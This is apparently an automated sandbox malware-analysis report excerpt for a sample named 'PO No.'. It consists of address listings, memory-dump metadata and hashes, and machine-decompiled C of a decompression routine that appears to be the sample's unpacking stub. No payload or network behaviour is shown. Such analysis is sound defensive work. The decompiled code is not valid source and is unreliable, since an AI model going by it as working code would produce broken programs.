                                                                      0x00406e92
                                                                      0x00406e7d
                                                                      0x00406e7d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406e9e
                                                                      0x00406e9e
                                                                      0x00406ea2
                                                                      0x00406ea9
                                                                      0x00406eac
                                                                      0x00406eaf
                                                                      0x00406ea4
                                                                      0x00406ea4
                                                                      0x00406ea4
                                                                      0x00406eb2
                                                                      0x00406eb5
                                                                      0x00406eb8
                                                                      0x00406eb8
                                                                      0x00406ebb
                                                                      0x00406ebe
                                                                      0x00406ec1
                                                                      0x00406ec1
                                                                      0x00406ec4
                                                                      0x00406ecb
                                                                      0x00406ed0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406f5e
                                                                      0x00406f5e
                                                                      0x00406f62
                                                                      0x00407300
                                                                      0x00407300
                                                                      0x00000000
                                                                      0x00407300
                                                                      0x00406f68
                                                                      0x00406f68
                                                                      0x00406f6b
                                                                      0x00406f6e
                                                                      0x00406f72
                                                                      0x00406f75
                                                                      0x00406f7b
                                                                      0x00406f7d
                                                                      0x00406f7d
                                                                      0x00406f7d
                                                                      0x00406f80
                                                                      0x00406f83
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406b53
                                                                      0x00406b53
                                                                      0x00406b57
                                                                      0x004072c4
                                                                      0x004072c4
                                                                      0x00000000
                                                                      0x004072c4
                                                                      0x00406b5d
                                                                      0x00406b5d
                                                                      0x00406b60
                                                                      0x00406b63
                                                                      0x00406b67
                                                                      0x00406b6a
                                                                      0x00406b70
                                                                      0x00406b72
                                                                      0x00406b72
                                                                      0x00406b72
                                                                      0x00406b75
                                                                      0x00406b78
                                                                      0x00406b78
                                                                      0x00406b7b
                                                                      0x00406b7e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406b84
                                                                      0x00406b84
                                                                      0x00406b8a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406b90
                                                                      0x00406b90
                                                                      0x00406b94
                                                                      0x00406b97
                                                                      0x00406b9a
                                                                      0x00406b9d
                                                                      0x00406ba0
                                                                      0x00406ba1
                                                                      0x00406ba4
                                                                      0x00406ba6
                                                                      0x00406bac
                                                                      0x00406baf
                                                                      0x00406bb2
                                                                      0x00406bb5
                                                                      0x00406bb8
                                                                      0x00406bbb
                                                                      0x00406bbe
                                                                      0x00406bda
                                                                      0x00406bdd
                                                                      0x00406be0
                                                                      0x00406be3
                                                                      0x00406bea
                                                                      0x00406bee
                                                                      0x00406bf0
                                                                      0x00406bf4
                                                                      0x00406bc0
                                                                      0x00406bc0
                                                                      0x00406bc4
                                                                      0x00406bcc
                                                                      0x00406bd1
                                                                      0x00406bd3
                                                                      0x00406bd5
                                                                      0x00406bd5
                                                                      0x00406bf7
                                                                      0x00406bfe
                                                                      0x00406c01
                                                                      0x00000000
                                                                      0x00406c07
                                                                      0x00406c07
                                                                      0x00000000
                                                                      0x00406c07
                                                                      0x00000000
                                                                      0x00406c0c
                                                                      0x00406c0c
                                                                      0x00406c10
                                                                      0x004072d0
                                                                      0x004072d0
                                                                      0x00000000
                                                                      0x004072d0
                                                                      0x00406c16
                                                                      0x00406c16
                                                                      0x00406c19
                                                                      0x00406c1c
                                                                      0x00406c20
                                                                      0x00406c23
                                                                      0x00406c29
                                                                      0x00406c2b
                                                                      0x00406c2b
                                                                      0x00406c2b
                                                                      0x00406c2e
                                                                      0x00406c31
                                                                      0x00406c31
                                                                      0x00406c31
                                                                      0x00406c37
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406c39
                                                                      0x00406c39
                                                                      0x00406c3c
                                                                      0x00406c3f
                                                                      0x00406c42
                                                                      0x00406c45
                                                                      0x00406c48
                                                                      0x00406c4b
                                                                      0x00406c4e
                                                                      0x00406c51
                                                                      0x00406c54
                                                                      0x00406c57
                                                                      0x00406c6f
                                                                      0x00406c72
                                                                      0x00406c75
                                                                      0x00406c78
                                                                      0x00406c78
                                                                      0x00406c7b
                                                                      0x00406c7f
                                                                      0x00406c81
                                                                      0x00406c59
                                                                      0x00406c59
                                                                      0x00406c61
                                                                      0x00406c66
                                                                      0x00406c68
                                                                      0x00406c6a
                                                                      0x00406c6a
                                                                      0x00406c84
                                                                      0x00406c8b
                                                                      0x00406c8e
                                                                      0x00000000
                                                                      0x00406c90
                                                                      0x00406c90
                                                                      0x00000000
                                                                      0x00406c90
                                                                      0x00406c8e
                                                                      0x00406c95
                                                                      0x00406c95
                                                                      0x00406c95
                                                                      0x00406c95
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406cd0
                                                                      0x00406cd0
                                                                      0x00406cd4
                                                                      0x004072dc
                                                                      0x004072dc
                                                                      0x00000000
                                                                      0x004072dc
                                                                      0x00406cda
                                                                      0x00406cda
                                                                      0x00406cdd
                                                                      0x00406ce0
                                                                      0x00406ce4
                                                                      0x00406ce7
                                                                      0x00406ced
                                                                      0x00406cef
                                                                      0x00406cef
                                                                      0x00406cef
                                                                      0x00406cf2
                                                                      0x00406cf5
                                                                      0x00406cf5
                                                                      0x00406cfb
                                                                      0x00406c99
                                                                      0x00406c99
                                                                      0x00406c9c
                                                                      0x00000000
                                                                      0x00406c9c
                                                                      0x00406cfd
                                                                      0x00406cfd
                                                                      0x00406d00
                                                                      0x00406d03
                                                                      0x00406d06
                                                                      0x00406d09
                                                                      0x00406d0c
                                                                      0x00406d0f
                                                                      0x00406d12
                                                                      0x00406d15
                                                                      0x00406d18
                                                                      0x00406d1b
                                                                      0x00406d33
                                                                      0x00406d36
                                                                      0x00406d39
                                                                      0x00406d3c
                                                                      0x00406d3c
                                                                      0x00406d3f
                                                                      0x00406d43
                                                                      0x00406d45
                                                                      0x00406d1d
                                                                      0x00406d1d
                                                                      0x00406d25
                                                                      0x00406d2a
                                                                      0x00406d2c
                                                                      0x00406d2e
                                                                      0x00406d2e
                                                                      0x00406d48
                                                                      0x00406d4f
                                                                      0x00406d52
                                                                      0x00000000
                                                                      0x00406d54
                                                                      0x00406d54
                                                                      0x00000000
                                                                      0x00406d54
                                                                      0x00000000
                                                                      0x00406fe1
                                                                      0x00406fe1
                                                                      0x00406fe5
                                                                      0x0040730c
                                                                      0x0040730c
                                                                      0x00000000
                                                                      0x0040730c
                                                                      0x00406feb
                                                                      0x00406feb
                                                                      0x00406fee
                                                                      0x00406ff1
                                                                      0x00406ff5
                                                                      0x00406ff8
                                                                      0x00406ffe
                                                                      0x00407000
                                                                      0x00407000
                                                                      0x00407000
                                                                      0x00407003
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406db1
                                                                      0x00406db1
                                                                      0x00406db4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004070f0
                                                                      0x004070f0
                                                                      0x004070f4
                                                                      0x00407116
                                                                      0x00407116
                                                                      0x00407119
                                                                      0x00407123
                                                                      0x00407126
                                                                      0x00407126
                                                                      0x00000000
                                                                      0x00407126
                                                                      0x004070f6
                                                                      0x004070f6
                                                                      0x004070f9
                                                                      0x004070fd
                                                                      0x00407100
                                                                      0x00407100
                                                                      0x00407103
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004071ad
                                                                      0x004071ad
                                                                      0x004071b1
                                                                      0x004071cf
                                                                      0x004071cf
                                                                      0x004071cf
                                                                      0x004071cf
                                                                      0x004071d6
                                                                      0x004071dd
                                                                      0x004071e4
                                                                      0x004071e4
                                                                      0x004071eb
                                                                      0x004071ee
                                                                      0x004071f5
                                                                      0x00000000
                                                                      0x004071f8
                                                                      0x004071b3
                                                                      0x004071b3
                                                                      0x004071b6
                                                                      0x004071b9
                                                                      0x004071bc
                                                                      0x004071c3
                                                                      0x00407107
                                                                      0x00407107
                                                                      0x0040710a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040729e
                                                                      0x0040729e
                                                                      0x004072a1
                                                                      0x004071a2
                                                                      0x004071a2
                                                                      0x004071a2
                                                                      0x00000000
                                                                      0x004071a8
                                                                      0x00000000
                                                                      0x00406ed8
                                                                      0x00406ed8
                                                                      0x00406eda
                                                                      0x00406ee1
                                                                      0x00406ee2
                                                                      0x00406ee4
                                                                      0x00406ee7
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004071eb
                                                                      0x004071eb
                                                                      0x004071ee
                                                                      0x004071f5
                                                                      0x00000000
                                                                      0x004071f8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406f1d
                                                                      0x00406f1d
                                                                      0x00406f20
                                                                      0x00406f56
                                                                      0x00406f56
                                                                      0x00407086
                                                                      0x00407086
                                                                      0x00407086
                                                                      0x00407086
                                                                      0x00407089
                                                                      0x00407089
                                                                      0x0040708c
                                                                      0x0040708e
                                                                      0x00407318
                                                                      0x00407318
                                                                      0x00000000
                                                                      0x00407318
                                                                      0x00407094
                                                                      0x00407094
                                                                      0x00407097
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040709d
                                                                      0x0040709d
                                                                      0x004070a1
                                                                      0x004070a4
                                                                      0x004070a4
                                                                      0x004070a4
                                                                      0x00000000
                                                                      0x004070a4
                                                                      0x00406f22
                                                                      0x00406f22
                                                                      0x00406f24
                                                                      0x00406f26
                                                                      0x00406f28
                                                                      0x00406f2b
                                                                      0x00406f2c
                                                                      0x00406f2e
                                                                      0x00406f30
                                                                      0x00406f33
                                                                      0x00406f36
                                                                      0x00406f4c
                                                                      0x00406f4c
                                                                      0x00406f51
                                                                      0x00406f89
                                                                      0x00406f89
                                                                      0x00406f8d
                                                                      0x00406fb6
                                                                      0x00406fb9
                                                                      0x00406fbb
                                                                      0x00406fc2
                                                                      0x00406fc5
                                                                      0x00406fc8
                                                                      0x00406fc8
                                                                      0x00406fcd
                                                                      0x00406fcd
                                                                      0x00406fcf
                                                                      0x00406fd2
                                                                      0x00406fd9
                                                                      0x00406fdc
                                                                      0x00407009
                                                                      0x00407009
                                                                      0x0040700c
                                                                      0x0040700f
                                                                      0x00407083
                                                                      0x00407083
                                                                      0x00407083
                                                                      0x00407083
                                                                      0x00000000
                                                                      0x00407083
                                                                      0x00407011
                                                                      0x00407011
                                                                      0x00407017
                                                                      0x0040701a
                                                                      0x0040701d
                                                                      0x00407020
                                                                      0x00407023
                                                                      0x00407026
                                                                      0x00407029
                                                                      0x0040702c
                                                                      0x0040702f
                                                                      0x00407032
                                                                      0x0040704b
                                                                      0x0040704d
                                                                      0x00407050
                                                                      0x00407051
                                                                      0x00407054
                                                                      0x00407056
                                                                      0x00407059
                                                                      0x0040705b
                                                                      0x0040705d
                                                                      0x00407060
                                                                      0x00407062
                                                                      0x00407065
                                                                      0x00407069
                                                                      0x0040706b
                                                                      0x0040706b
                                                                      0x0040706c
                                                                      0x0040706f
                                                                      0x00407072
                                                                      0x00407034
                                                                      0x00407034
                                                                      0x0040703c
                                                                      0x00407041
                                                                      0x00407043
                                                                      0x00407046
                                                                      0x00407046
                                                                      0x00407075
                                                                      0x0040707c
                                                                      0x00407006
                                                                      0x00407006
                                                                      0x00407006
                                                                      0x00407006
                                                                      0x00000000
                                                                      0x0040707e
                                                                      0x0040707e
                                                                      0x00000000
                                                                      0x0040707e
                                                                      0x0040707c
                                                                      0x00406f8f
                                                                      0x00406f8f
                                                                      0x00406f92
                                                                      0x00406f94
                                                                      0x00406f97
                                                                      0x00406f9a
                                                                      0x00406f9d
                                                                      0x00406f9f
                                                                      0x00406fa2
                                                                      0x00406fa5
                                                                      0x00406fa5
                                                                      0x00406fa8
                                                                      0x00406fa8
                                                                      0x00406fab
                                                                      0x00406fb2
                                                                      0x00406f86
                                                                      0x00406f86
                                                                      0x00406f86
                                                                      0x00406f86
                                                                      0x00000000
                                                                      0x00406fb4
                                                                      0x00406fb4
                                                                      0x00000000
                                                                      0x00406fb4
                                                                      0x00406fb2
                                                                      0x00406f38
                                                                      0x00406f38
                                                                      0x00406f3b
                                                                      0x00406f3d
                                                                      0x00406f40
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406c9f
                                                                      0x00406c9f
                                                                      0x00406ca3
                                                                      0x004072e8
                                                                      0x004072e8
                                                                      0x00000000
                                                                      0x004072e8
                                                                      0x00406ca9
                                                                      0x00406ca9
                                                                      0x00406cac
                                                                      0x00406caf
                                                                      0x00406cb2
                                                                      0x00406cb5
                                                                      0x00406cb8
                                                                      0x00406cbb
                                                                      0x00406cbd
                                                                      0x00406cc0
                                                                      0x00406cc3
                                                                      0x00406cc6
                                                                      0x00406cc8
                                                                      0x00406cc8
                                                                      0x00406cc8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406e2a
                                                                      0x00406e2a
                                                                      0x00406e2e
                                                                      0x004072f4
                                                                      0x004072f4
                                                                      0x00000000
                                                                      0x004072f4
                                                                      0x00406e34
                                                                      0x00406e34
                                                                      0x00406e37
                                                                      0x00406e3a
                                                                      0x00406e3d
                                                                      0x00406e3f
                                                                      0x00406e3f
                                                                      0x00406e3f
                                                                      0x00406e42
                                                                      0x00406e45
                                                                      0x00406e48
                                                                      0x00406e4b
                                                                      0x00406e4e
                                                                      0x00406e51
                                                                      0x00406e52
                                                                      0x00406e54
                                                                      0x00406e54
                                                                      0x00406e54
                                                                      0x00406e57
                                                                      0x00406e5a
                                                                      0x00406e5d
                                                                      0x00406e60
                                                                      0x00406e60
                                                                      0x00406e60
                                                                      0x00406e63
                                                                      0x00406e65
                                                                      0x00406e65
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004070a7
                                                                      0x004070a7
                                                                      0x004070a7
                                                                      0x004070ab
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004070b1
                                                                      0x004070b1
                                                                      0x004070b4
                                                                      0x004070b7
                                                                      0x004070ba
                                                                      0x004070bc
                                                                      0x004070bc
                                                                      0x004070bc
                                                                      0x004070bf
                                                                      0x004070c2
                                                                      0x004070c5
                                                                      0x004070c8
                                                                      0x004070cb
                                                                      0x004070ce
                                                                      0x004070cf
                                                                      0x004070d1
                                                                      0x004070d1
                                                                      0x004070d1
                                                                      0x004070d4
                                                                      0x004070d7
                                                                      0x004070da
                                                                      0x004070dd
                                                                      0x004070e0
                                                                      0x004070e4
                                                                      0x004070e6
                                                                      0x004070e9
                                                                      0x00000000
                                                                      0x004070eb
                                                                      0x004070eb
                                                                      0x00406e68
                                                                      0x00406e68
                                                                      0x00000000
                                                                      0x00406e68
                                                                      0x004070e9
                                                                      0x0040731e
                                                                      0x0040731e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040694d
                                                                      0x00407355
                                                                      0x00407355
                                                                      0x00000000
                                                                      0x00407355
                                                                      0x004071a2
                                                                      0x00407222
                                                                      0x004071eb

                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 86ce5b7836e8efc76d9880a3b815598044ae852516a7a266a4593ffa0bd4c046
                                                                      • Instruction ID: 1a1db7b112f5c349f32c040b215ce8adb2231ea54f988815808aa67dfaaa6b76
                                                                      • Opcode Fuzzy Hash: 86ce5b7836e8efc76d9880a3b815598044ae852516a7a266a4593ffa0bd4c046
                                                                      • Instruction Fuzzy Hash: 6AA15271E04228CBDF28CFA8C8446ADBBB1FF44305F14816ED856BB281D7786A86DF45
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 98%
                                                                      			E004070F0() {
                                                                      				void _t533;
                                                                      				signed int _t534;
                                                                      				signed int _t535;
                                                                      				signed int* _t605;
                                                                      				void* _t612;
                                                                      
                                                                      				L0:
                                                                      				while(1) {
                                                                      					L0:
                                                                      					if( *(_t612 - 0x40) != 0) {
                                                                      						 *(_t612 - 0x84) = 0x13;
                                                                      						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
                                                                      						goto L132;
                                                                      					} else {
                                                                      						__eax =  *(__ebp - 0x4c);
                                                                      						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                      						__ecx =  *(__ebp - 0x58);
                                                                      						__eax =  *(__ebp - 0x4c) << 4;
                                                                      						__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                      						L130:
                                                                      						 *(__ebp - 0x58) = __eax;
                                                                      						 *(__ebp - 0x40) = 3;
                                                                      						L144:
                                                                      						 *(__ebp - 0x7c) = 0x14;
                                                                      						L145:
                                                                      						__eax =  *(__ebp - 0x40);
                                                                      						 *(__ebp - 0x50) = 1;
                                                                      						 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                      						L149:
                                                                      						if( *(__ebp - 0x48) <= 0) {
                                                                      							__ecx =  *(__ebp - 0x40);
                                                                      							__ebx =  *(__ebp - 0x50);
                                                                      							0 = 1;
                                                                      							__eax = 1 << __cl;
                                                                      							__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                      							__eax =  *(__ebp - 0x7c);
                                                                      							 *(__ebp - 0x44) = __ebx;
                                                                      							while(1) {
                                                                      								L140:
                                                                      								 *(_t612 - 0x88) = _t533;
                                                                      								while(1) {
                                                                      									L1:
                                                                      									_t534 =  *(_t612 - 0x88);
                                                                      									if(_t534 > 0x1c) {
                                                                      										break;
                                                                      									}
                                                                      									switch( *((intOrPtr*)(_t534 * 4 +  &M0040735D))) {
                                                                      										case 0:
                                                                      											if( *(_t612 - 0x6c) == 0) {
                                                                      												goto L170;
                                                                      											}
                                                                      											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                      											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                                      											_t534 =  *( *(_t612 - 0x70));
                                                                      											if(_t534 > 0xe1) {
                                                                      												goto L171;
                                                                      											}
                                                                      											_t538 = _t534 & 0x000000ff;
                                                                      											_push(0x2d);
                                                                      											asm("cdq");
                                                                      											_pop(_t569);
                                                                      											_push(9);
                                                                      											_pop(_t570);
                                                                      											_t608 = _t538 / _t569;
                                                                      											_t540 = _t538 % _t569 & 0x000000ff;
                                                                      											asm("cdq");
                                                                      											_t603 = _t540 % _t570 & 0x000000ff;
                                                                      											 *(_t612 - 0x3c) = _t603;
                                                                      											 *(_t612 - 0x1c) = (1 << _t608) - 1;
                                                                      											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
                                                                      											_t611 = (0x300 << _t603 + _t608) + 0x736;
                                                                      											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
                                                                      												L10:
                                                                      												if(_t611 == 0) {
                                                                      													L12:
                                                                      													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
                                                                      													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                                                      													goto L15;
                                                                      												} else {
                                                                      													goto L11;
                                                                      												}
                                                                      												do {
                                                                      													L11:
                                                                      													_t611 = _t611 - 1;
                                                                      													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
                                                                      												} while (_t611 != 0);
                                                                      												goto L12;
                                                                      											}
                                                                      											if( *(_t612 - 4) != 0) {
                                                                      												GlobalFree( *(_t612 - 4));
                                                                      											}
                                                                      											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                      											 *(_t612 - 4) = _t534;
                                                                      											if(_t534 == 0) {
                                                                      												goto L171;
                                                                      											} else {
                                                                      												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
                                                                      												goto L10;
                                                                      											}
                                                                      										case 1:
                                                                      											L13:
                                                                      											__eflags =  *(_t612 - 0x6c);
                                                                      											if( *(_t612 - 0x6c) == 0) {
                                                                      												 *(_t612 - 0x88) = 1;
                                                                      												goto L170;
                                                                      											}
                                                                      											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                      											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
                                                                      											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                                      											_t45 = _t612 - 0x48;
                                                                      											 *_t45 =  *(_t612 - 0x48) + 1;
                                                                      											__eflags =  *_t45;
                                                                      											L15:
                                                                      											if( *(_t612 - 0x48) < 4) {
                                                                      												goto L13;
                                                                      											}
                                                                      											_t546 =  *(_t612 - 0x40);
                                                                      											if(_t546 ==  *(_t612 - 0x74)) {
                                                                      												L20:
                                                                      												 *(_t612 - 0x48) = 5;
                                                                      												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
                                                                      												goto L23;
                                                                      											}
                                                                      											 *(_t612 - 0x74) = _t546;
                                                                      											if( *(_t612 - 8) != 0) {
                                                                      												GlobalFree( *(_t612 - 8));
                                                                      											}
                                                                      											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
                                                                      											 *(_t612 - 8) = _t534;
                                                                      											if(_t534 == 0) {
                                                                      												goto L171;
                                                                      											} else {
                                                                      												goto L20;
                                                                      											}
                                                                      										case 2:
                                                                      											L24:
                                                                      											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
                                                                      											 *(_t612 - 0x84) = 6;
                                                                      											 *(_t612 - 0x4c) = _t553;
                                                                      											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
                                                                      											goto L132;
                                                                      										case 3:
                                                                      											L21:
                                                                      											__eflags =  *(_t612 - 0x6c);
                                                                      											if( *(_t612 - 0x6c) == 0) {
                                                                      												 *(_t612 - 0x88) = 3;
                                                                      												goto L170;
                                                                      											}
                                                                      											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                      											_t67 = _t612 - 0x70;
                                                                      											 *_t67 =  &(( *(_t612 - 0x70))[1]);
                                                                      											__eflags =  *_t67;
                                                                      											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                                                      											L23:
                                                                      											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
                                                                      											if( *(_t612 - 0x48) != 0) {
                                                                      												goto L21;
                                                                      											}
                                                                      											goto L24;
                                                                      										case 4:
                                                                      											L133:
                                                                      											_t531 =  *_t605;
                                                                      											_t588 = _t531 & 0x0000ffff;
                                                                      											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
                                                                      											if( *(_t612 - 0xc) >= _t564) {
                                                                      												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
                                                                      												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
                                                                      												 *(_t612 - 0x40) = 1;
                                                                      												_t532 = _t531 - (_t531 >> 5);
                                                                      												__eflags = _t532;
                                                                      												 *_t605 = _t532;
                                                                      											} else {
                                                                      												 *(_t612 - 0x10) = _t564;
                                                                      												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                                                      												 *_t605 = (0x800 - _t588 >> 5) + _t531;
                                                                      											}
                                                                      											if( *(_t612 - 0x10) >= 0x1000000) {
                                                                      												goto L139;
                                                                      											} else {
                                                                      												goto L137;
                                                                      											}
                                                                      										case 5:
                                                                      											L137:
                                                                      											if( *(_t612 - 0x6c) == 0) {
                                                                      												 *(_t612 - 0x88) = 5;
                                                                      												goto L170;
                                                                      											}
                                                                      											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
                                                                      											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                      											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                                      											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                                                      											L139:
                                                                      											_t533 =  *(_t612 - 0x84);
                                                                      											goto L140;
                                                                      										case 6:
                                                                      											__edx = 0;
                                                                      											__eflags =  *(__ebp - 0x40);
                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                      												__eax =  *(__ebp - 4);
                                                                      												__ecx =  *(__ebp - 0x38);
                                                                      												 *(__ebp - 0x34) = 1;
                                                                      												 *(__ebp - 0x84) = 7;
                                                                      												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                      												goto L132;
                                                                      											}
                                                                      											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                      											__esi =  *(__ebp - 0x60);
                                                                      											__cl = 8;
                                                                      											__cl = 8 -  *(__ebp - 0x3c);
                                                                      											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                      											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                      											__ecx =  *(__ebp - 0x3c);
                                                                      											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                      											__ecx =  *(__ebp - 4);
                                                                      											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                      											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                      											__eflags =  *(__ebp - 0x38) - 4;
                                                                      											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                      											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                      											if( *(__ebp - 0x38) >= 4) {
                                                                      												__eflags =  *(__ebp - 0x38) - 0xa;
                                                                      												if( *(__ebp - 0x38) >= 0xa) {
                                                                      													_t98 = __ebp - 0x38;
                                                                      													 *_t98 =  *(__ebp - 0x38) - 6;
                                                                      													__eflags =  *_t98;
                                                                      												} else {
                                                                      													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                      												}
                                                                      											} else {
                                                                      												 *(__ebp - 0x38) = 0;
                                                                      											}
                                                                      											__eflags =  *(__ebp - 0x34) - __edx;
                                                                      											if( *(__ebp - 0x34) == __edx) {
                                                                      												__ebx = 0;
                                                                      												__ebx = 1;
                                                                      												goto L61;
                                                                      											} else {
                                                                      												__eax =  *(__ebp - 0x14);
                                                                      												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                      												__eflags = __eax -  *(__ebp - 0x74);
                                                                      												if(__eax >=  *(__ebp - 0x74)) {
                                                                      													__eax = __eax +  *(__ebp - 0x74);
                                                                      													__eflags = __eax;
                                                                      												}
                                                                      												__ecx =  *(__ebp - 8);
                                                                      												__ebx = 0;
                                                                      												__ebx = 1;
                                                                      												__al =  *((intOrPtr*)(__eax + __ecx));
                                                                      												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                      												goto L41;
                                                                      											}
                                                                      										case 7:
                                                                      											__eflags =  *(__ebp - 0x40) - 1;
                                                                      											if( *(__ebp - 0x40) != 1) {
                                                                      												__eax =  *(__ebp - 0x24);
                                                                      												 *(__ebp - 0x80) = 0x16;
                                                                      												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                      												__eax =  *(__ebp - 0x28);
                                                                      												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                      												__eax =  *(__ebp - 0x2c);
                                                                      												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                      												__eax = 0;
                                                                      												__eflags =  *(__ebp - 0x38) - 7;
                                                                      												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                      												__al = __al & 0x000000fd;
                                                                      												__eax = (__eflags >= 0) - 1 + 0xa;
                                                                      												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                      												__eax =  *(__ebp - 4);
                                                                      												__eax =  *(__ebp - 4) + 0x664;
                                                                      												__eflags = __eax;
                                                                      												 *(__ebp - 0x58) = __eax;
                                                                      												goto L69;
                                                                      											}
